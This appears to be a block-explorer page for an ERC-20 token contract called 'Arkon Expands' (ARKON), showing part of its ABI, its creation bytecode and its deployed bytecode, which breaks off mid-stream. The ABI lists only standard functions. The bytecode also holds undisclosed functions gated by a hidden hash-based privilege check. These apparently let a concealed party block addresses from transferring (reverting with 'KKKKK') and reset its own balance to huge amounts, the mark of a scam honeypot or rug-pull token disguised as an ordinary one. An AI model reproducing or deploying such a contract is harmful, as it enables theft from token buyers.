ability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
60a060405261dead73ffffffffffffffffffffffffffffffffffffffff1660809073ffffffffffffffffffffffffffffffffffffffff168152507f1779a64e8b9cd87d9944553af38e0a07794a3c9286f5269ef06354b2c306ff0160001b6009556000600b553480156200007257600080fd5b5060405162002ac138038062002ac183398181016040528101906200009891906200067e565b620000b8620000ac6200016f60201b60201c565b6200017760201b60201c565b8260069081620000c9919062000963565b508160079081620000db919062000963565b50620000ec6200023b60201b60201c565b5080600860006101000a81548164ffffffffff021916908364ffffffffff160217905550620001663362000125620002fc60201b60201c565b600a62000133919062000bda565b600860009054906101000a900464ffffffffff1664ffffffffff166200015a919062000c2b565b6200030560201b60201c565b50505062000e03565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006200024d6200016f60201b60201c565b600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060006200029f6200016f60201b60201c565b604051602001620002b1919062000cfa565b60405160208183030381529060405280519060200120905060016003600083815260200190815260200160002060006101000a81548160ff0219169083151502179055508091505090565b60006009905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000377576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200036e9062000d78565b60405180910390fd5b80600560008282546200038b919062000d9a565b925050819055506000151560036000600954815260200190815260200160002060009054906101000a900460ff16151503620003f057600160036000600954815260200190815260200160002060006101000a81548160ff0219169083151502179055505b80600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200049d919062000de6565b60405180910390a35050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6200051282620004c7565b810181811067ffffffffffffffff82111715620005345762000533620004d8565b5b80604052505050565b600062000549620004a9565b905062000557828262000507565b919050565b600067ffffffffffffffff8211156200057a5762000579620004d8565b5b6200058582620004c7565b9050602081019050919050565b60005b83811015620005b257808201518184015260208101905062000595565b60008484015250505050565b6000620005d5620005cf846200055c565b6200053d565b905082815260208101848484011115620005f457620005f3620004c2565b5b6200060184828562000592565b509392505050565b600082601f830112620006215762000620620004bd565b5b815162000633848260208601620005be565b91505092915050565b600064ffffffffff82169050919050565b62000658816200063c565b81146200066457600080fd5b50565b60008151905062000678816200064d565b92915050565b6000806000606084860312156200069a5762000699620004b3565b5b600084015167ffffffffffffffff811115620006bb57620006ba620004b8565b5b620006c98682870162000609565b935050602084015167ffffffffffffffff811115620006ed57620006ec620004b8565b5b620006fb8682870162000609565b92505060406200070e8682870162000667565b9150509250925092565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200076b57607f821691505b60208210810362000781576200078062000723565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007eb7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620007ac565b620007f78683620007ac565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620008446200083e62000838846200080f565b62000819565b6200080f565b9050919050565b6000819050919050565b620008608362000823565b620008786200086f826200084b565b848454620007b9565b825550505050565b600090565b6200088f62000880565b6200089c81848462000855565b505050565b5b81811015620008c457620008b860008262000885565b600181019050620008a2565b5050565b601f8211156200091357620008dd8162000787565b620008e8846200079c565b81016020851015620008f8578190505b6200091062000907856200079c565b830182620008a1565b50505b505050565b600082821c905092915050565b6000620009386000198460080262000918565b1980831691505092915050565b600062000953838362000925565b9150826002028217905092915050565b6200096e8262000718565b67ffffffffffffffff8111156200098a5762000989620004d8565b5b62000996825462000752565b620009a3828285620008c8565b600060209050601f831160018114620009db5760008415620009c6578287015190505b620009d2858262000945565b86555062000a42565b601f198416620009eb8662000787565b60005b8281101562000a1557848901518255600182019150602085019450602081019050620009ee565b8683101562000a35578489015162000a31601f89168262000925565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000ad85780860481111562000ab05762000aaf62000a4a565b5b600185161562000ac05780820291505b808102905062000ad08562000a79565b945062000a90565b94509492505050565b60008262000af3576001905062000bc6565b8162000b03576000905062000bc6565b816001811462000b1c576002811462000b275762000b5d565b600191505062000bc6565b60ff84111562000b3c5762000b3b62000a4a565b5b8360020a91508482111562000b565762000b5562000a4a565b5b5062000bc6565b5060208310610133831016604e8410600b841016171562000b975782820a90508381111562000b915762000b9062000a4a565b5b62000bc6565b62000ba6848484600162000a86565b9250905081840481111562000bc05762000bbf62000a4a565b5b81810290505b9392505050565b600060ff82169050919050565b600062000be7826200080f565b915062000bf48362000bcd565b925062000c237fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000ae1565b905092915050565b600062000c38826200080f565b915062000c45836200080f565b925082820262000c55816200080f565b9150828204841483151762000c6f5762000c6e62000a4a565b5b5092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000ca38262000c76565b9050919050565b60008160601b9050919050565b600062000cc48262000caa565b9050919050565b600062000cd88262000cb7565b9050919050565b62000cf462000cee8262000c96565b62000ccb565b82525050565b600062000d08828462000cdf565b60148201915081905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000d60601f8362000d17565b915062000d6d8262000d28565b602082019050919050565b6000602082019050818103600083015262000d938162000d51565b9050919050565b600062000da7826200080f565b915062000db4836200080f565b925082820190508082111562000dcf5762000dce62000a4a565b5b92915050565b62000de0816200080f565b82525050565b600060208201905062000dfd600083018462000dd5565b92915050565b608051611c9462000e2d600039600081816104c401528181610e2b0152610f010152611c946000f3fe608060405234801561001057600080fd5b50600436106101215760003560e01c8063715018a6116100ad578063a9059cbb11610071578063a9059cbb14610320578063b69b486414610350578063dd62ed3e1461036c578063e4703d7c1461039c578063f2fde38b146103b857610121565b8063715018a61461028e5780638da5cb5b1461029857806395d89b41146102b6578063a457c2d7146102d4578063a67334901461030457610121565b806327c8f835116100f457806327c8f835146101c2578063313ce567146101e0578063375460cc146101fe578063395093511461022e57806370a082311461025e57610121565b806306fdde0314610126578063095ea7b31461014457806318160ddd1461017457806323b872dd14610192575b600080fd5b61012e6103d4565b60405161013b9190611277565b60405180910390f35b61015e60048036038101906101599190611332565b610466565b60405161016b919061138d565b60405180910390f35b61017c610489565b60405161018991906113b7565b60405180910390f35b6101ac60048036038101906101a791906113d2565b610493565b6040516101b9919061138d565b60405180910390f35b6101ca6104c2565b6040516101d79190611434565b60405180910390f35b6101e86104e6565b6040516101f5919061146b565b60405180910390f35b61021860048036038101906102139190611486565b6104ef565b60405161022591906113b7565b60405180910390f35b61024860048036038101906102439190611332565b610538565b604051610255919061138d565b60405180910390f35b61027860048036038101906102739190611486565b61056f565b60405161028591906113b7565b60405180910390f35b6102966105b8565b005b6102a06105cc565b6040516102ad9190611434565b60405180910390f35b6102be6105f5565b6040516102cb9190611277565b60405180910390f35b6102ee60048036038101906102e99190611332565b610687565b6040516102fb919061138d565b60405180910390f35b61031e600480360381019061031991906114b3565b6106fe565b005b61033a60048036038101906103359190611332565b61070a565b604051610347919061138d565b60405180910390f35b61036a60048036038101906103659190611486565b61072d565b005b610386600480360381019061038191906114e0565b610783565b60405161039391906113b7565b60405180910390f35b6103b660048036038101906103b19190611486565b61080a565b005b6103d260048036038101906103cd9190611486565b61086f565b005b6060600680546103e39061154f565b80601f016020809104026020016040519081016040528092919081815260200182805461040f9061154f565b801561045c5780601f106104315761010080835404028352916020019161045c565b820191906000526020600020905b81548152906001019060200180831161043f57829003601f168201915b5050505050905090565b6000806104716108f2565b905061047e8185856108fa565b600191505092915050565b6000600554905090565b60008061049e6108f2565b90506104ab858285610ac3565b6104b6858585610b4f565b60019150509392505050565b7f000000000000000000000000000000000000000000000000000000000000000081565b60006009905090565b6000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6000806105436108f2565b90506105648185856105558589610783565b61055f91906115af565b6108fa565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105c0610f8e565b6105ca600061100c565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546106049061154f565b80601f01602080910402602001604051908101604052809291908181526020018280546106309061154f565b801561067d5780601f106106525761010080835404028352916020019161067d565b820191906000526020600020905b81548152906001019060200180831161066057829003601f168201915b5050505050905090565b6000806106926108f2565b905060006106a08286610783565b9050838110156106e5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106dc90611655565b60405180910390fd5b6106f282868684036108fa565b60019250505092915050565b610707816110d0565b50565b6000806107156108f2565b9050610722818585610b4f565b600191505092915050565b610735611139565b15610780576000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610812611139565b1561086c57620f42406005546108289190611675565b600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b610877610f8e565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108e6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108dd90611729565b60405180910390fd5b6108ef8161100c565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610969576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610960906117bb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036109d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109cf9061184d565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ab691906113b7565b60405180910390a3505050565b6000610acf8484610783565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b495781811015610b3b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b32906118b9565b60405180910390fd5b610b4884848484036108fa565b5b50505050565b6000610ba46000600a60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546111a590919063ffffffff16565b905081811115610be9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be090611925565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610c58576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c4f906119b7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cc7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cbe90611a49565b60405180910390fd5b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610d4e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4590611adb565b60405180910390fd5b6000610d786064610d6a600b54876111bb90919063ffffffff16565b6111d190919063ffffffff16565b90506000610d8f82866111a590919063ffffffff16565b9050848303600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254019250508190555081600160007f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051610eee91906113b7565b60405180910390a36000821115610f85577f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f7c91906113b7565b60405180910390a35b50505050505050565b610f966108f2565b73ffffffffffffffffffffffffffffffffffffffff16610fb46105cc565b73ffffffffffffffffffffffffffffffffffffffff161461100a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100190611b47565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6110d8611139565b1561113657806005546110eb9190611675565b600160006110f76108f2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000806111446108f2565b6040516020016111549190611baf565b6040516020818303038152906040528051906020012090506003600082815260200190815260200160002060009054906101000a900460ff161561119c5760019150506111a2565b60009150505b90565b600081836111b39190611bca565b905092915050565b600081836111c99190611675565b905092915050565b600081836111df9190611c2d565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611221578082015181840152602081019050611206565b60008484015250505050565b6000601f19601f8301169050919050565b6000611249826111e7565b61125381856111f2565b9350611263818560208601611203565b61126c8161122d565b840191505092915050565b60006020820190508181036000830152611291818461123e565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006112c98261129e565b9050919050565b6112d9816112be565b81146112e457600080fd5b50565b6000813590506112f6816112d0565b92915050565b6000819050919050565b61130f816112fc565b811461131a57600080fd5b50565b60008135905061132c81611306565b92915050565b6000806040838503121561134957611348611299565b5b6000611357858286016112e7565b92505060206113688582860161131d565b9150509250929050565b60008115159050919050565b61138781611372565b82525050565b60006020820190506113a2600083018461137e565b92915050565b6113b1816112fc565b82525050565b60006020820190506113cc60008301846113a8565b92915050565b6000806000606084860312156113eb576113ea611299565b5b60006113f9868287016112e7565b935050602061140a868287016112e7565b925050604061141b8682870161131d565b9150509250925092565b61142e816112be565b82525050565b60006020820190506114496000830184611425565b92915050565b600060ff82169050919050565b6114658161144f565b82525050565b6000602082019050611480600083018461145c565b92915050565b60006020828403121561149c5761149b611299565b5b60006114aa848285016112e7565b91505092915050565b6000602082840312156114c9576114c8611299565b5b60006114d78482850161131d565b91505092915050565b600080604083850312156114f7576114f6611299565b5b6000611505858286016112e7565b9250506020611516858286016112e7565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061156757607f821691505b60208210810361157a57611579611520565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115ba826112fc565b91506115c5836112fc565b92508282019050808211156115dd576115dc611580565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061163f6025836111f2565b915061164a826115e3565b604082019050919050565b6000602082019050818103600083015261166e81611632565b9050919050565b6000611680826112fc565b915061168b836112fc565b9250828202611699816112fc565b915082820484148315176116b0576116af611580565b5b5092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006117136026836111f2565b915061171e826116b7565b604082019050919050565b6000602082019050818103600083015261174281611706565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117a56024836111f2565b91506117b082611749565b604082019050919050565b600060208201905081810360008301526117d481611798565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118376022836111f2565b9150611842826117db565b604082019050919050565b600060208201905081810360008301526118668161182a565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006118a3601d836111f2565b91506118ae8261186d565b602082019050919050565b600060208201905081810360008301526118d281611896565b9050919050565b7f4b4b4b4b4b000000000000000000000000000000000000000000000000000000600082015250565b600061190f6005836111f2565b915061191a826118d9565b602082019050919050565b6000602082019050818103600083015261193e81611902565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119a16025836111f2565b91506119ac82611945565b604082019050919050565b600060208201905081810360008301526119d081611994565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611a336023836111f2565b9150611a3e826119d7565b604082019050919050565b60006020820190508181036000830152611a6281611a26565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611ac56026836111f2565b9150611ad082611a69565b604082019050919050565b60006020820190508181036000830152611af481611ab8565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b316020836111f2565b9150611b3c82611afb565b602082019050919050565b60006020820190508181036000830152611b6081611b24565b9050919050565b60008160601b9050919050565b6000611b7f82611b67565b9050919050565b6000611b9182611b74565b9050919050565b611ba9611ba4826112be565b611b86565b82525050565b6000611bbb8284611b98565b60148201915081905092915050565b6000611bd5826112fc565b9150611be0836112fc565b9250828203905081811115611bf857611bf7611580565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611c38826112fc565b9150611c43836112fc565b925082611c5357611c52611bfe565b5b82820490509291505056fea26469706673582212200e8abbee4b6ae33469379f4abbbfd65c1ca98a136105398a6ef15a6ba1b0987b64736f6c63430008130033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000061aa800000000000000000000000000000000000000000000000000000000000000000d41726b6f6e20457870616e647300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000541524b4f4e000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101215760003560e01c8063715018a6116100ad578063a9059cbb11610071578063a9059cbb14610320578063b69b486414610350578063dd62ed3e1461036c578063e4703d7c1461039c578063f2fde38b146103b857610121565b8063715018a61461028e5780638da5cb5b1461029857806395d89b41146102b6578063a457c2d7146102d4578063a67334901461030457610121565b806327c8f835116100f457806327c8f835146101c2578063313ce567146101e0578063375460cc146101fe578063395093511461022e57806370a082311461025e57610121565b806306fdde0314610126578063095ea7b31461014457806318160ddd1461017457806323b872dd14610192575b600080fd5b61012e6103d4565b60405161013b9190611277565b60405180910390f35b61015e60048036038101906101599190611332565b610466565b60405161016b919061138d565b60405180910390f35b61017c610489565b60405161018991906113b7565b60405180910390f35b6101ac60048036038101906101a791906113d2565b610493565b6040516101b9919061138d565b60405180910390f35b6101ca6104c2565b6040516101d79190611434565b60405180910390f35b6101e86104e6565b6040516101f5919061146b565b60405180910390f35b61021860048036038101906102139190611486565b6104ef565b60405161022591906113b7565b60405180910390f35b61024860048036038101906102439190611332565b610538565b604051610255919061138d565b60405180910390f35b61027860048036038101906102739190611486565b61056f565b60405161028591906113b7565b60405180910390f35b6102966105b8565b005b6102a06105cc565b6040516102ad9190611434565b60405180910390f35b6102be6105f5565b6040516102cb9190611277565b60405180910390f35b6102ee60048036038101906102e99190611332565b610687565b6040516102fb919061138d565b60405180910390f35b61031e600480360381019061031991906114b3565b6106fe565b005b61033a60048036038101906103359190611332565b61070a565b604051610347919061138d565b60405180910390f35b61036a60048036038101906103659190611486565b61072d565b005b610386600480360381019061038191906114e0565b610783565b60405161039391906113b7565b60405180910390f35b6103b660048036038101906103b19190611486565b61080a565b005b6103d260048036038101906103cd9190611486565b61086f565b005b6060600680546103e39061154f565b80601f016020809104026020016040519081016040528092919081815260200182805461040f9061154f565b801561045c5780601f106104315761010080835404028352916020019161045c565b820191906000526020600020905b81548152906001019060200180831161043f57829003601f168201915b5050505050905090565b6000806104716108f2565b905061047e8185856108fa565b600191505092915050565b6000600554905090565b60008061049e6108f2565b90506104ab858285610ac3565b6104b6858585610b4f565b60019150509392505050565b7f000000000000000000000000000000000000000000000000000000000000dead81565b60006009905090565b6000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6000806105436108f2565b90506105648185856105558589610783565b61055f91906115af565b6108fa565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105c0610f8e565b6105ca600061100c565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546106049061154f565b80601f01602080910402602001604051908101604052809291908181526020018280546106309061154f565b801561067d5780601f106106525761010080835404028352916020019161067d565b820191906000526020600020905b81548152906001019060200180831161066057829003601f168201915b5050505050905090565b6000806106926108f2565b905060006106a08286610783565b9050838110156106e5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106dc90611655565b60405180910390fd5b6106f282868684036108fa565b60019250505092915050565b610707816110d0565b50565b6000806107156108f2565b9050610722818585610b4f565b600191505092915050565b610735611139565b15610780576000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610812611139565b1561086c57620f42406005546108289190611675565b600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b610877610f8e565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108e6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108dd90611729565b60405180910390fd5b6108ef8161100c565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610969576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610960906117bb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036109d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109cf9061184d565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ab691906113b7565b60405180910390a3505050565b6000610acf8484610783565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b495781811015610b3b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b32906118b9565b60405180910390fd5b610b4884848484036108fa565b5b50505050565b6000610ba46000600a60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546111a590919063ffffffff16565b905081811115610be9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be090611925565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610c58576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c4f906119b7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cc7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cbe90611a49565b60405180910390fd5b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610d4e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4590611adb565b60405180910390fd5b6000610d786064610d6a600b54876111bb90919063ffffffff16565b6111d190919063ffffffff16565b90506000610d8f82866111a590919063ffffffff16565b9050848303600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254019250508190555081600160007f000000000000000000000000000000000000000000000000000000000000dead73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051610eee91906113b7565b60405180910390a36000821115610f85577f000000000000000000000000000000000000000000000000000000000000dead73ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f7c91906113b7565b60405180910390a35b50505050505050565b610f966108f2565b73ffffffffffffffffffffffffffffffffffffffff16610fb46105cc565b73ffffffffffffffffffffffffffffffffffffffff161461100a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100190611b47565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6110d8611139565b1561113657806005546110eb9190611675565b600160006110f76108f2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000806111446108